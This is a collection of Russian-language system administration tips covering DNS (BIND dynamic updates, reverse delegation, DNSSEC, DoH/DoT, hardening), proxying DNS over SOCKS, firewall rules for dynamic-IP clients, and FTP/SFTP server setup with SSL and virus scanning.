Если на локальной машине кроме socks имеется выход в интернет или доступ к DNS-резолверу, проблем не возникает, но если выход машины производится только через socks при запуске программ подобных браузеру opera всплывает неприятная проблема с резолвингом имен. Проблема в том, что утилиты подобные tsocks не позволяют перенаправлять DNS запросы через Socks и организовать работу резолвера поверх этого протокола. Выход найден в использовании privoxy (http://www.privoxy.org/), некеширующего HTTP-прокси, умеющего организовывать проброс трафика через Socks и самое важное - умеющего резолвить DNS-имена на socks-сервере. Ставим privoxy: sudo apt-get install privoxy Предположим на локальной машине имеется доступ к socks-серверу 127.0.0.1:1080 В моем случае socks использовался для организации выхода в Интернет через телефон на платформе Android, делается это так: На телефоне включаем в настройках режим "USB Debugging" (Settings / Applications / Development) и запускаем программу Tetherbot (http://graha.ms/androidproxy/Tetherbot.apk). На локальный компьютер копируем программу adb из состава Android SDK и выполняем: ./adb forward tcp:1080 tcp:1080 теперь в Firefox можно прописать socks-сервер 127.0.0.1:1080 и поставить в about:config network.proxy.socks_remote_dns=true, все будет прекрасно работать. Но нам нужно заставить работать opera и другие программы, поэтому настраиваем privoxy. В /etc/privoxy/config проверяем наличие директивы (по умолчанию выбран порт 8118) listen-address 127.0.0.1:8080 и добавляем строку: forward-socks4a / 127.0.0.1:1080 . или forward-socks5 / 127.0.0.1:1080 . (внимание, режим forward-socks4 проброс DNS не поддерживает) Запускаем privoxy: sudo /etc/init.d/privoxy start Далее в opera устанавливаем в настройках обычного HTTP-прокси хост 127.0.0.1 и порт 8080. Все прекрасно работает, более того в качестве бонуса privoxy по умолчанию вырезает рекламу. Для консольных приложений удобно использовать пакет proxychains (http://proxychains.sourceforge.net/) в состав которого входит утилита proxyresolv для резолвинга имен через socks.

Настройка Dynamic DNS на базе Bind9 и nsupdate (доп. ссылка 1) Автор: Stepanoff [комментарии]

В данном руководстве описано как настроить динамическое обновление зоны DNS с удаленной машины, например с DHCP сервера, или если адрес выдается динамически, как при использовании ADSL. Описано как простое обновление зоны вручную, или по крону, так и обновление зоны DHCP сервером при выдаче ip-адреса клиенту. Настройка идентична для всех дистрибутивов и ОС (Linux, FreeBSD, Mac OS и прочих систем где есть Bind9). Итак, у нас есть две машины, dns-сервер, и клиент, который будет обновлять зону в соответствии со своим ip-адресом. На обоих машинах должен быть установлен bind9. Настройку можно начать с генерации ключей, по которым будет происходить авторизация клиента на dns-сервере, в примере ниже показано как сгенерировать ключ, в примере я использую имя dnsupdater, вы можете поменять на нужное вам. Генерировать ключи нужно на машине клиенте. dnssec-keygen -a hmac-md5 -b 128 -n USER dnsupdater После выполнения команды в текущей директории вы найдете 2 файла с именем Kdnsupdater.+157+31204.key и Kdnsupdater.+157+31204.private, последние пять цифр в имени меняются каждый раз при генерации, и у вас они будут другие. Файл с расширением .key является публичным ключем, он используется на сервере dns, файл с расширением .private нужен для авторизации клиента. Перейдем к настройке сервера, в директории с конфигурационными файлами bind9 (обычно это либо /etc/bind, /etc/namedb, /var/named) Я настраивал сервер на линуксе, там это была директория /etc/bind, я буду использовать ее в этом руководстве. Создайте файл dnskeys.conf в директории /etc/bind, затем впишите туда данные о нашем ключе, сгенерированном на машине клиента # cat Kdnsupdater.+157+31204.key dnsupdater. IN KEY 0 3 157 YmEIxrGd1w1dT6Kyo9CQtQ== Так выглядит наш ключ, нам нужна только часть после цифры 157, а именно YmEIxrGd1w1dT6Kyo9CQtQ== (она каждый раз новая, у вас будет другая) В файл /etc/bind/dnskeys.conf впишите следующее (замените имя ключа и secret на ваши) key dnsupdater { algorithm hmac-md5; secret "YmEIxrGd1w1dT6Kyo9CQtQ=="; }; Затем в файл /etc/bind/named.conf впишите в самый конец файла include "/etc/bind/dnskeys.conf"; Затем настроим зоны которые будут обновляться удаленно, в моем примере это зона для домена example.com и зона для обратных записей для адресов 192.168.0.0/24, ниже приведены примеры сразу для двух этих зон, обратите внимание на то, что файлы зон для обновления должны быть созданы заранее, в них должны быть прописаны SOA , NS, SERIAL и прочие стандартные настройки зоны. zone "example.com" { type master; file "master/example.com" allow-update { key dnsupdater; }; }; zone "0.168.192.in-addr.arpa" { type master; file "master/ptr/0.168.192.in-addr.arpa"; allow-update { key dnsupdater; }; }; После этого выполните команду rndc reload для применения настроек. Небольшое отступление, если у вас установлена операционная система Ubuntu или Debian, или у вас в системе используется apparmor то вам необходимо перенастроить его, так как пользователь от которого работает DNS сервер bind9 не имеет права записи в каталог с файлами конфигурации /etc/bind, а удаленное обновление зон как раз требует возможности записи в этот каталог от пользователя bind. Исправить это можно отредактировав конфигурационный файл apparmor для ограничения bind, найти его можно в директории /etc/apparmor.d/, имя файла usr.sbin.named. Отредактируйте файл как показано в примере ниже Значение по умолчанию: /etc/bind/** r, Должно быть: /etc/bind/** rw, После этого перезапустите apparmor и bind9. Теперь сервер готов к удаленному обновлению зон, перейдем к конечной настройке клиента. Создадим простой скрипт который будет парсить файл с командами для обновления зон, в нем нам понадобится путь до второго ключа, с расширением .private, вы можете положить его в директорию /etc/bind, и не забудьте сменить имя ключа в скрипте на ваше. #!/bin/bash /usr/bin/nsupdate -k /etc/bind/Kdnsupdater.+157+31204.private -v $1 Сохраним данный скрипт с именем zonechange.sh и сделаем его исполняемым командой chmod +x zoneupdate.sh Затем создадим файл обновления зон, обновлять можно сразу несколько зон, по очереди. В примере мы добавим обратную зону для адреса 192.168.0.1, удалим обратную зону для адреса 192.168.0.15, и добавим поддомен test.example.com. Для обновления существующих записей нужно сначала удалить старую, затем добавить новую. server ns.example.com zone 0.168.192.in-addr.arpa update delete 15.0.168.192.in-addr.arpa. 10800 IN PTR somedomain.example.com. update add 1.0.168.192.in-addr.arpa. 10800 IN PTR somedomain123.example.com. send zone example.com update add test.example.com. 10800 IN A 192.168.0.254 send Как видите, необходимо записи для обратной зоны и поддоменов указывать полностью, и перед сменой зоны отправлять обновление для предыдущей. Так же необходимо указывать TTL для каждой записи. Сохраните файл с именем changes, или любым вам удобным, в директории со скриптом zonechange.sh. Проверим работоспособность скрипта, выполните нижеприведенную команду для отправки запроса на обновление наших зон на сервер ./zonechanhe.sh changes Если все прошло успешно никакого вывода не последует, на сервере в логах можно будет увидеть подробности изменения зон. У меня на сервере записи в файлах внесенные удаленно появляются только после рестарта bind9, но работать начинают сразу после отправки обновления с клиента, так что проверяйте работу обновления не по наличию записи в файлах зон, а по запросу данной записи с сервера посредством nslookup или dig. Теперь можно перейти к настройке обновления записей зон при помощи dhcp сервера. Настройки DNS мы менять не будем, они описаны выше, поэтому мы будем пользоваться ими. Ключи так же возьмем из примеров выше. Настройка описана для DHCP сервера isc dhcp3 В глобальные опции DHCP сервера внесите следующие правки (файл конфигурации dhcpd.conf) ddns-update-style interim; # Включение обновления dns записей для статично прописанных хостов update-static-leases on; Затем добавим информацию о зонах которые будем обновлять, и информацию о ключе для авторизации. Обратите внимание, записи о зонах и ключе вносятся так же как в конфиге bind, но БЕЗ кавычек, в противном случае у вас будет ошибка синтаксиса. key dnsupdater { algorithm hmac-md5 secret YmEIxrGd1w1dT6Kyo9CQtQ==; } zone 0.168.192.in-addr.arpa { primary ns.example.com; key dnsupdater; } zone example.com { primary dns; key dnsupdater; } Далее пример конфига для клиента без фиксированного ip адреса host happylaptop { hardware ethernet 00:0a:39:22:da:39; option host-name "happylaptop"; option domain-name "example.com"; ddns-hostname "happylaptop"; ddns-domain-name "example.com"; } Затем идет пример для группы хостов, или секции group в dhcpd.conf group { option domain-name "example.com"; ddns-domainname "example.com"; host happylaptop { hardware ethernet 00:0a:39:22:da:39; option host-name "happylaptop"; ddns-hostname "happylaptop"; } host dellstation { hardware ethernet 00:b1:48:2a:ad:9c; option host-name "dellstation"; ddns-hostname "dellstation"; } } Далее идет пример клиента со фиксированным ip адресом host jukebox { hardware ethernet 01:d0:06:b8:68:34; fixed-address 192.168.0.5; ddns-hostname "jukebox"; ddns-domain-name "example.com"; option host-name "jukebox"; option domain-name "example.com"; } После сохранения настроек не забудьте перезапусить DHCP-сервер. Ссылки по теме: * http://www.semicomplete.com/blog/articles/dynamic-dns-with-dhcp * http://ubuntuforums.org/showthread.php?t=713469

Автоматизация создания массовых записей на DNS-сервере Bind [комментарии]

Для заведения типовых записей внутри DNS зоны, например, строк вида "adsl-1-2-3-4.pool.test.ru удобно использовать директиву "$GENERATE". При помощи $GENERATE можно массово создавать элементы для записей A, CNAME, DNAME, NS и PTR. Например, создадим в зоне 128 записей подобных: host-N IN A 192.168.1.N где N от 0 до 127: $GENERATE 0-127 $ A 192.168.1.$ Или массово пропишем в обратной зоне PTR для всех рабочих адресов: $GENERATE 0-255 $ PTR host-$.pool.test.ru. в итоге будут созданы записи: 0 PTR host-0.pool.test.ru. 1 PTR host-1.pool.test.ru. ... 255 PTR host-255.pool.test.ru.

Автоматическое изменение правил IPTABLES для IP адресов из записей DynDNS (доп. ссылка 1) Автор: zaikini [комментарии]

Возникла задача предоставить сервис для клиентов, использующих внешние динамические адреса. Доступ к сервису ограничен правилами IPTABLES. Клиентам, которым необходимо получить услугу предлагается создать учетную запись на ресурсе dyndns.org, клиент получит доменное имя в виде client.dyndns.org. При каждом изменении ip адреса клиента мы всегда узнаем его адрес по доменному имени. Если мы добавим правило в iptables для этого доменного имени, правило будет работать только для текущего ip адреса клиента и при последующем изменении ip адреса, доступ к сервису будет ограничен. Оригинал решения был найден здесь: http://dave.thehorners.com/content/view/86/65/ , а мы всего лишь доработаем этот скрипт. Создаем несколько каталогов: /root/dynhosts/ - общий каталог /root/dynhosts/zones/ - здесь будем хранить файлы доменных зон клиентов /root/dynhosts/logs/ - лог файлы работы скрипта /root/dynhosts/scripts/ - здесь будет находится сам запускаемый скрипт Создаем лог-файл: touch /root/dynhosts/logs/dynhosts.log Создаем файл зоны клиента: touch /root/dynhosts/zones/client.dyndns.org Создаем сам скрипт /root/dynhosts/scripts/firewall-dynhosts.sh #!/bin/bash # # filename: firewall-dynhosts.sh # NOW=$(date) CHAIN="dynamichosts" # change this to whatever chain you want. IPTABLES="/sbin/iptables" # create the chain in iptables. $IPTABLES -N $CHAIN # insert the chain into the input chain @ the head of the list. $IPTABLES -I INPUT 1 -j $CHAIN # flush all the rules in the chain $IPTABLES -F $CHAIN FILES=`ls --format=single-column /root/dynhosts/zones/` echo $FILES for file in $FILES do HOSTFILE="/root/dynhosts/zones/$file" echo $HOSTFILE # lookup host name from dns tables IP=`/usr/bin/dig +short $file | /usr/bin/tail -n 1` if [ "${#IP}" = "0" ]; then echo "$NOW Couldn't lookup hostname for $file, failed." >> /root/dynhosts/logs/dynhosts.log continue fi OLDIP="" if [ -a $HOSTFILE ]; then OLDIP=`cat $HOSTFILE` echo "CAT returned: $?" fi # save off new ip. echo $IP>$HOSTFILE echo "Updating $file in iptables." echo "Inserting new rule ($IP)" $IPTABLES -A $CHAIN -s $IP/32 -j ACCEPT done exit0 Запускаем скрипт: /root/dynhosts/scripts/firewall-dynhosts.sh iptables: Chain already exists client.dyndns.org CAT returned: 0 Updating client.dyndns.org in iptables. Inserting new rule (213.64.141.6) Проверяем, cat /root/dynhosts/zones/client.dyndns.org 213.64.141.6 /sbin/iptables -nL dynamichosts Chain dynamichosts target prot opt source destination ACCEPT all - 213.64.141.6 0.0.0.0/0 Если такого доменного имени не существует в /root/dynhosts/logs/dynhosts.log была бы запись следующего содержания: Tue Aug 25 09:47:15 MSD 2009 Couldn't lookup hostname for client.dyndns.org, failed. После того как контракт с клиентом истек достаточно удалить файл его зоны из /root/dynhosts/zones/. Осталось добавить выполнение скрипта в крон.

Как удалить из кэша DNS сервера Bind конкретную запись, без перезагрузки всего кэша Автор: Константин Брызгалов [комментарии]

Для удаления отдельной записи в кэше Bind нужно использовать команду "rndc flushname" Запрашиваем имя mx.example.ru у сервера 127.0.0.1: # dig +short @127.0.0.1 mx.example.ru 192.168.168.168 Сохраняем для изучения дамп с содержимым кэша: # rndc dumpdb -all Находим в нем искомое имя, чтобы убедится, что оно в кэше: # grep mx.example.ru /var/bind/named_dump.db mx.example.ru. 431988 A 192.168.168.168 Выполняем команду для удаления mx.example.ru из кэша: # rndc flushname mx.example.ru. Убедимся, что имя удалилось: rm /var/bind/named_dump.db rndc dumpdb -all grep mx.example.ru /var/bind/named_dump.db

MAC DNS лист Автор: Vladimir Shingarev [комментарии]

Иногда нужно узнать какому производителю принадлежит оконечное оборудование, наблюдая только его мак на интерфейсе. А открывать браузер для этого лениво. В таком случае удобно создать MAC-based dns лист. Пользоваться просто: ket:/home/sva# host -t txt 001243.macl.nov.ru 001243.macl.nov.ru descriptive text "Cisco" ket:/home/sva# host -t txt 0050ba.macl.nov.ru 0050ba.macl.nov.ru descriptive text "D-LINK"

DNS: Как делегировать неполную (не /24) сеть in-addr.arpa клиенту Автор: nikl [комментарии]

Предположим, вы провайдер (provider1) и подключившийся к вам клиент (firma1) взял в пользование сеть /28 Как обеспечить ему самостоятельное управление обратными доменами в его подсети? Можно делигировать ему неполную сеть, на примере: У вас есть большая сеть 200.100.100.100/24, клиент из нее взял себе блок 200.100.100.176/28 В своем файле зоны прописываете: 100.100.200.in-addr.arpa IN SOA ns1.provider1.ru. hostmaster.provider1.ru. ( 2005102000 ; serial 36000 ; refresh 3600 ; retry 1728000 ; expire 172800 ; minimum ) NS ns1.provider1.ru. NS ns2.provider1.ru. $ORIGIN 100.100.200.in-addr.arpa. ... 173 PTR client173-gw.provider1.ru. 174 PTR client174-gw.provider1.ru. 175 PTR client175-gw.provider1.ru. 176/28 NS ns.firma1.ru. $GENERATE 176-191 $ CNAME $.176/28 192 PTR client192-gw.provider1.ru. 193 PTR client193-gw.provider1.ru. Админ клиента на своем NS'е (ns.firma1.ru) создает зону "176/28.100.100.200.in-addr.arpa" , в которой спокойно администрирует свои IP'ы, не отвлекая провайдера от работы.

Решение проблемы резолвинга при включенных forwarders в BIND 9 Автор: Vladimir V. Kamarzin [комментарии]

Если bind 9 одновременно является переадресующим сервером ( forwarders { s.o.m.e; }; ) и авторитативным для какой-либо зоны, при делегировании подзоны возникает проблема резолвинга хостов этой подзоны: subzone IN NS ns.subzone.zone.tld. ns.subzone IN A 192.168.0.1 dig @ns.zone.tld. somehost.subzone.zone.tld. a при этом бинд будет спрашивать запись A для хоста somehost.subzone.zone.tld. вовсе не у ns.subzone.zone.tld. , а у тех серверов, которые прописаны форвардерами в options! Чтобы bind резолвил хосты напрямую, через ns.subzone.zone.tld. , необходимо в конфигурации зоны zone.tld. прописать: zone "zone.tld." { type master; ---> forwarders { /* empty! */ }; notify no; file "file"; allow-query { any; }; allow-transfer { s.o.m.e; }; };

Почему на некоторые запросы named слишком долго (1-4 сек.) резолвит имя (доп. ссылка 1) [комментарии]

Проблемы на IPv4 хостах без IPv6 коннективити, обусловлены появлением IPv6 адресов у B и A корневых NS. Решение представлено в BIND 9.2.5 и 9.3.1, которые еще не вышли. Другой путь - собрать bind с ./configure --disable-ipv6 или запустить с опцией -4 (для bind 9.3.0).

Пример ведения расширенных логов в named [комментарии]

# named.conf # для более делаьной информации о трансферах расскомментируйте "severity info" logging { channel default_log { file "/var/log/dns.log"; # severity info; severity notice; print-time yes; print-category yes; print-severity yes; }; channel more_log { file "/var/log/dns_more.log"; # severity info; severity notice; print-time yes; print-category yes; print-severity yes; }; category queries { default_log;}; category xfer-in { default_log; }; category xfer-out { default_log; }; category security { more_log; }; category resolver { more_log; }; category client { more_log; }; category unmatched { more_log; }; category default { more_log; }; category database { more_log; }; };

Настройка динамического обновления DNS зон. (доп. ссылка 1) Автор: Jeff Garzik [комментарии]

Генерируем ключи: dnssec-keygen -a HMAC-MD5 -b 512 -n USER foo22.bar44.com. Настройки сервера: /etc/named.conf: include "keys.conf"; ...... zone "bar44.com" { type master; file "bar44.com.zone"; update-policy { grant laptop.bar44.com. name laptop.bar44.com. A TXT; grant foo22.bar44.com. subdomain bar44.com. ANY; }; # или #allow-update { # key foo22.bar44.com. #}; }; /etc/namedb/keys.conf: key foo22.bar44.com. { algorithm HMAC-MD5; secret "секретный ключ"; }; Для обновления зоны: nsupdate -k Kfoo22.bar44.com.+157+12505.private -v cmd_file.txt Пример cmd_file.txt: server ns.bar44.com zone bar44.com update delete somehost.bar44.com. A update add somehost.bar44.com. 86400 A 10.10.10.1 show send

Оптимизация работы DNS резолвера, случайный выбор NS (доп. ссылка 1) [обсудить]

В /etc/resolv.conf: options attempts=2, timeout=2, rotate ,где attempts - число попыток посылки запроса к серверу. timeout - таймаут запроса (по умолчанию 5 сек.) rotate случайный выбор nameserver из списка, а не опрос по порядку. timeout - таймаут за который сервер должен успеть ответить. Для отладки удобно использовать "options debug"

Как организовать рекурсивные запросы только через жестко определенные сервера. [обсудить]

options { # Если "first" - то если forwarders не ответил - запрашиваем сами. # Если "only" - сами никогда не запрашиваем, только через forwarders. forward only; forwarders {192.168.1.1; 192.168.2.1;}; };

Как запретить рекурсивные запросы через DNS сервер для чужих клиентов [комментарии]

acl localnet { 192.168.1.0/24; 10.0.1.0/24; }; options { allow-recursion {localnet; 192.168.2.0/24}; # Полностью запросы можно ограничить через "allow-query" или "blackhole" };

Как запретить Bind показывать свою версию для внешнего мира. (доп. ссылка 1) [комментарии]

Узнать версию можно через: dig @ns.test.ru version.bind chaos txt Чтобы запретить, нужно в options блоке named.conf прописать: options { ... version "0.1"; };

Как разрешить полный трансфер DNS зоны только для избранных серверов. [обсудить]

zone "host.ru" { type master; allow-transfer { 1.2.3.4; 1.2.3.5; 1.2.3.6;}; file "host.ru"; }

Как избавиться от ограничения числа одновременных коннектов к named [обсудить]

options { directory "/etc/namedb"; recursive-clients 5000; tcp-clients 500; };

Включение DNS-over-HTTPS на системном уровне в KDE neon и Ubuntu Автор: popov895 [комментарии]

В этой заметке я не буду объяснять, почему предпочтительно использовать DNS-over-HTTPS (DoH), а просто опишу, как его можно включить на системном уровне в KDE neon / Ubuntu. Внимание: не забывайте делать резервные копии системных файлов, которые планируете редактировать! Для начала необходимо установить пакет dnscrypt-proxy: sudo apt install dnscrypt-proxy Далее в файле /etc/dnscrypt-proxy/dnscrypt-proxy.toml в поле server_names нужно указать список серверов, к которым будет обращаться dnscrypt-proxy для разрешения DNS (список доступных DoH-серверов здесь). После редактирования файла dnscrypt-proxy.toml нужно перезапустить dnscrypt-proxy: sudo systemctl restart dnscrypt-proxy.service Далее нужно запретить NetworkManager изменять файл /etc/resolv.conf. Для этого нужно в файле /etc/NetworkManager/NetworkManager.conf в секции main добавить запись rc-manager=unmanaged. Должно выглядеть так: [main] ... rc-manager=unmanaged ... Далее нужно отредактировать файл /etc/resolv.conf. Для начала удалим текущий файл: sudo rm /etc/resolv.conf И создадим новый: sudo touch /etc/resolv.conf С таким содержимым: nameserver 127.0.2.1 options edns0 single-request-reopen И последнее, что нам нужно сделать - отключить systemd-resolved и перезапусить NetworkManager: sudo systemctl disable --now systemd-resolved.service sudo systemctl restart NetworkManager.service

Настройка DNSSEC в BIND 9.9 (доп. ссылка 1) (доп. ссылка 2) [комментарии]

В BIND 9.9 появились новые средства для автоматизации формирования цифровых подписей и управления ключами, позволяющие добавить поддержку DNSSEC без правки DNS-зон. Настройка DNSSEC для домена. Создаём отдельную директорию для файлов с ключами, так как файлов генерируется достаточно много, для каждой зоны имеет смысл создать отдельную директорию с ключами. mkdir /etc/namedb/keys Для работы DNSSEC требуется создать master-ключ (KSK, Key Signing Key), который будет использован для создания цифровых подписей для других ключей, и ключи для каждой из локальных зон (ZSK, Zone Signing Key). Создаём KSK-ключ: dnssec-keygen -f KSK -a RSASHA1 -b 2048 -n ZONE example.net Generating key pair......+++.....+++ Kexample.net.+005+38287 Создаём ZSK-ключ: dnssec-keygen -a RSASHA1 -b 2048 -n ZONE example.net Generating key pair.....+++ ..+++ Kexample.net.+005+55896 Делаем ключи доступными для чтения процессу named: chown bind:bind * Включим в настройках named.conf ведение лога DNSSEC для упрощения анализа возможных проблем. Подготовим директорию для хранения лога: mkdir /etc/namedb/log chown bind:bind /etc/namedb/log В named.conf пропишем путь к логу, который ограничим максимальным размером в 20 Мб: logging { channel dnssec_log { file "log/dnssec" size 20m; print-time yes; print-category yes; print-severity yes; severity debug 3; }; category dnssec { dnssec_log; }; }; Настроим DNSSEC для зоны example.net: zone example.net { type master; file "master/example.net"; key-directory "keys/"; inline-signing yes; auto-dnssec maintain; }; После перезапуска named в директории /etc/namedb/keys появятся следующие файлы: example.net example.net.jbk example.net.signed example.net.jnl Опция 'inline-signing yes' включает режим прозрачного формирования подписей, не требуя внесения изменений непосредственно в файл зоны. При работе inline-signing вручную поддерживаемый файл с зоной преобразуется в динамическую зону, для которой создаётся цифровая подпись. Из-за этого выдаваемый сервером серийный номер, отличается от серийного номера прописанного в файле с зоной. Изменения DNSSEC производятся в jnl-файле с журналом изменений. При запросе параметров зоны можно заметить появление нового поля RRSIG dig example.net +dnssec ... example.net. 600 IN A 1.2.3.4 example.net. 600 IN RRSIG A 5 3 600 2012021356423 20120415331566 21695 net. IKekIJa314313G/xZpQ+B2313eqaDceR/VNcdsdasxV2 ... Так как DNSSEC основан на обеспечении цепочки доверия, чтобы процесс верификации заработал, требуется чтобы регистратор заверил созданный KSK-ключ, подтвердив своё доверие. Для этого создадим на основе KSK-ключа DSKEY-ключ (Delegation Signature Key) dnssec-dsfromkey Kexample.net.+005+38287 example.net. IN DS 38287 5 1 E8C01C9CA1252389A9CB4E example.net. IN DS 38287 5 2 57EC936A479A94C32324123134234523492359A623 39712D53 Копируем две сгенерированные строки в интерфейсе ввода DSKEY на сайте регистратора домена. Верификация заработает после того как регистратор обновит параметры первичной зоны. Для поддержки DNSSEC-проверки на стороне резолвера следует добавить в настройки named.conf: options { ... dnssec-enable yes; dnssec-validation auto; ... };

Как в DNS прописать два образа одной и той же зоны для внутренней и внешней сети. Автор: uldus [комментарии]

view "internal" { match-clients { 192.168.0.0/16; }; zone "test.ru" { type master; file "test.ru.int"; }; }; view "external" { match-clients { any; }; zone "test.ru" { type master; file "test.ru.ext"; }; };

FTP, Bittorrent

Включение DNS-Over-TLS в LEDE/OpenWrt через замену резолвера на Unbound (доп. ссылка 1) [комментарии]

По умолчанию в LEDE/OpenWrt в качестве резолвера применяется Dnsmasq, который не поддерживает DNS-over-TLS. Для включения шифрования DNS-трафика заменим Dnsmasq на Unbound и odhcpd: opkg update opkg install unbound odhcpd unbound-control opkg remove dnsmasq Для настройки через GUI опционально можно установить модуль: opkg install luci-app-unbound Указываем в /etc/unbound/unbound_ext.conf DNS-серверы с поддержкой TLS (например, 1.1.1.1 и 1.0.0.1): forward-zone: name: "." forward-addr: 1.1.1.1@853 forward-addr: 1.0.0.1@853 forward-addr: 2606:4700:4700::1111@853 forward-addr: 2606:4700:4700::1001@853 forward-ssl-upstream: yes Корректируем настройки /etc/config/unbound в соответствии с официальными рекомендациями по настройке связки unbound+odhcpd. Проверяем /etc/config/unbound: config unbound option add_local_fqdn '1' option add_wan_fqdn '1' option dhcp_link 'odhcpd' option dhcp4_slaac6 '1' option domain 'lan' option domain_type 'static' option listen_port '53' option rebind_protection '1' option unbound_control '1' Аналогично проверяем настройки /etc/config/dhcp: config dhcp 'lan' option dhcpv4 'server' option dhcpv6 'server' option interface 'lan' option leasetime '12h' option ra 'server' option ra_management '1' config odhcpd 'odhcpd' option maindhcp '1' option leasefile '/var/lib/odhcpd/dhcp.leases' option leasetrigger '/usr/lib/unbound/odhcpd.sh' Перезапускаем unbound: service unbound enable service unbound start

Настройка виртуальных пользователей и SSL в vsftpd (доп. ссылка 1) Автор: Бочка селёдки [комментарии]

Иногда возникает необходимость настроить виртуальных пользователей и SSL-шифрование в FTP-сервере vsftpd. Рассмотрим как это сделать в Debian Squeeze. Все действия выполняются от пользователя root. Сперва установим необходимые утилиты: aptitude install vsftpd openssl db4.8-util ftp-ssl где vsftpd - непосредственно FTP сервер; openssl - утилита создания SSL сертификатов, которые требуются в SSL режиме FTP сервера; db4.8-util - утилиты работы с базой данных BerkeleyDB, в которой будут хранится виртуальные пользователи; ftp-ssl - SSL версия FTP клиента, эта утилита нужна только на клиентской стороне. Добавим пользователя в систему, через которого будут работать виртуальные FTP-пользователи: useradd -d /home/ftp virtual Теперь изменим конфигурацию FTP сервера. Данных директив в файле конфигурации по-умолчанию нет, поэтому их можно просто добавить в конец файла /etc/vsftpd.conf: # включаем гостевой доступ через нашего виртуального пользователя guest_enable=YES guest_username=virtual # включаем SSL ssl_enable=YES # шифрование процедуры логина и всех передаваемых данных внутри сессии force_local_logins_ssl=YES force_local_data_ssl=YES # ущемляем права анонимных пользователей - их трафик шифроваться не будет # (только если анонимные пользователи разрешены) allow_anon_ssl=NO # используем только протокол TLS ssl_tlsv1=YES ssl_sslv2=NO ssl_sslv3=NO # многократное использование одной сессии require_ssl_reuse=NO Дополнительно для проверки соединения вы можете установить директиву local_enable=YES, которая разрешает локальным пользователям получить доступ по FTP к своим домашним директориям. Создаём базу данных виртуальных пользователей: db4.8_load -T -t hash /etc/vsftpd_login.db Эта утилита будет читать логины и пароли со стандартного ввода, один логин и один пароль на каждую отдельную строку. Вводим "user", нажимаем ввод, вводим "pass", нажимаем ввод. Изменяем процедуру аутентификации ftp пользователей через PAM в конфигурационном файле /etc/pam.d/vsftpd: # путь к базе данных виртуальных пользователей (без суффикса "db") account required pam_userdb.so db=/etc/vsftpd_login auth required pam_userdb.so db=/etc/vsftpd_login Создадим SSL-сертификат для FTP-сервера, время действия которого истечёт через год. Путь к этому сертификату уже прописан в конфигурационном файле vsftpd: cd /etc/ssl/private/ openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout vsftpd.pem -out vsftpd.pem Всё, осталось перезапустить сервис FTP: invoke-rc.d vsftpd restart Проверяем логин: ftp localhost Connected to localhost. 220 (vsFTPd 2.3.2) Name (localhost:root): user 234 Proceed with negotiation. [SSL Cipher DES-CBC3-SHA] 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp: pwd 257 "/" ftp: Как видим, вход был в SSL-режиме с использованием шифрования DES-CBC3-SHA. Теперь можно настроить пользовательские права на чтение и запись в файле /etc/vsftpd.conf. Следует отметить, что в статье описан способ настройки FTPS (FTP+SSL), который не стоит путать с SFTP - это два разных протокола.

Организация проверки загружаемых файлов на вирусы в PureFTPd (доп. ссылка 1) [комментарии]

Ниже представлена инструкция по интеграции в PureFTPd, работающем в Debian или Ubuntu, функции проверки новых файлов на предмет наличия вирусов. При обнаружении вируса загруженный файл удаляется. Устанавливаем антивирусный пакет ClamAV: sudo aptitude install clamav clamav-daemon Настраиваем PureFTPd. Создаем файл /etc/pure-ftpd/conf/CallUploadScript в который добавляем одну строку со словом "yes": echo "yes" > /etc/pure-ftpd/conf/CallUploadScript Создаем скрипт /etc/pure-ftpd/clamav_check.sh, который будет вызывать из PureFTPd для проверки новых файлов в clamav: #!/bin/sh /usr/bin/clamdscan --remove --quiet --no-summary "$1" Делаем скрипт исполняемым: chmod 755 /etc/pure-ftpd/clamav_check.sh Изменяем основой файл конфигурации PureFTPd /etc/default/pure-ftpd-common, находим по ключевому слову строку UPLOADSCRIPT и указываем путь к скрипту проверки, примерно так: UPLOADSCRIPT=/etc/pure-ftpd/clamav_check.sh Перезапускаем PureFTPd: /etc/init.d/pure-ftpd-mysql restart

Создание sftp сервера силами proftpd Автор: Alex Samorukov [комментарии]

Зачем нужен sftp В протоколе FTP есть 2 ключевые проблемы - во первых, пароли и данные передаются в открытом виде, во вторых - для каждой передачи устанавливается дополнительное соединение. Для шифрования данных и контрольного соединения был написан FTPS, но с ним проблем еще больше - все также требуется дополнительное соединение при передаче, а главное - контрольный канал теперь зашифрован и firewall никак не может помочь в прохождении FTP трафика через NAT. Кроме того - существуют различия в реализации, что добавляет еще больше проблем при использовании FTPS. SFTP - полностью новый протокол разработанный IETF SECSH, предлагающий аналогичные FTP возможности для удаленных операций и использующий SSH (обычно SSH2) для обеспечения шифрования и аутентификации. Известность получил в основном из-за того, что был встроен в SSH сервера, в частности - в OpenSSH 2.3.0 и выше. Недостатки sftp в OpenSSH До OpenSSH 4.9 sftp сервер требовал запуска внешнего исполняемого файла и построение chroot окружения было связанно с дополнительными действиями. Невозможно ограничить скорость передачи для конкретного пользователя. Сложно сделать отличную от SSH базу с пользователями. В целом - sftp сервер в OpenSSH всегда был лишь приятным дополнением к OpenSSH предоставляя на порядок меньшие возможности чем, например, proftpd. Впрочем, недавно необходимость выбора между удобством и безопасностью отпала так как был написан и реализован модуль mod_sftp для proftpd, о нем и пойдет речь. Использование модуля Впервые модуль появился в версии 1.3.2rc2, но на мой взгляд - уже вполне пригоден к использованию. Он не компилируется по умолчанию, так что для его использования надо указать его на этапе configure. Вы можете собрать proftpd из исходников, или если у вас redhat based OS - воспользоваться моим src.rpm. Модуль имеет множество возможностей полный список которых можно [[http://www.castaglia.org/proftpd/modules/mod_sftp.html посмотреть на сайте]]. Для минимальной настройки достаточно внести такие дополнения в файл конфигурации по умолчанию: Port 8022 SFTPEngine on SFTPHostKey /etc/ssh/ssh_host_dsa_key SFTPHostKey /etc/ssh/ssh_host_rsa_key и запустить proftpd. Теперь можно подключаться к порту 8022 любым sftp клиентом, например - мультиплатформенной FileZilla или command line sftp из комплекта OpenSSH. Используя виртуальные сервера можно сделать одновременную работу SFTP и FTP(S), ограничить доступ, сделать chroot для всех или некоторых сайтов и так далее. За примерно месяц использования я не обнаружил каких либо минусов данного решения по сравнению с OpenSSH sftp.

Настройка Pure-FTPd c авторизацией по скрипту (доп. ссылка 1) Автор: ExpE [комментарии]

